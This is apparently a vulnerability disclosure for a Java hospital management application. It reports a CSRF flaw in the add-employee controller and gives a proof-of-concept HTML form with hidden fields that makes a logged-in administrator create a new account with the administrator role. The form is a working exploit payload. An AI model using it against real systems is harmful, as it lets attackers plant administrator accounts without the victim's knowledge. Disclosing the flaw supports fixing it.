There is a csrf vulnerability in src/main/java/com/project/controller/administrator/AddEmployeeController.java.

[xuwudi666]

csrf payload:

<title>csrf</title>

csrf test!

    <form action="http://10.25.10.161:8080/HospitalManagement_war_exploded/addEmployee.html" method="POST">
        <input name="firstName" value="test" type="hidden"/>
        <input name="middleName" value="test" type="hidden"/>
        <input name="lastName" value="test" type="hidden"/>
        <input name="birthdate" value="1994-06-08" type="hidden"/>
        <input name="gender" value="female" type="hidden"/>
        <input name="email" value="123123123%40qq.com" type="hidden"/>
        <input name="mobileNo" value="111111111" type="hidden"/>
        <input name="adharNo" value="11111111" type="hidden"/>
        <input name="country" value="test" type="hidden"/>
        <input name="state" value="test" type="hidden"/>
        <input name="city" value="test" type="hidden"/>
        <input name="residentialAddress" value="test" type="hidden"/>
        <input name="permanentAddress" value="test" type="hidden"/>
        <input name="role" value="administrator" type="hidden"/>
        <input name="qualification" value="test" type="hidden"/>
        <input name="specialization" value="test" type="hidden"/>
        <input type="submit" value="click me!"/>
    </form>
</body>

Due to the backend not checking the Referer of the request and not using CSRF tokens to prevent CSRF vulnerabilities, it is possible to induce administrators to perform high-privileged operations.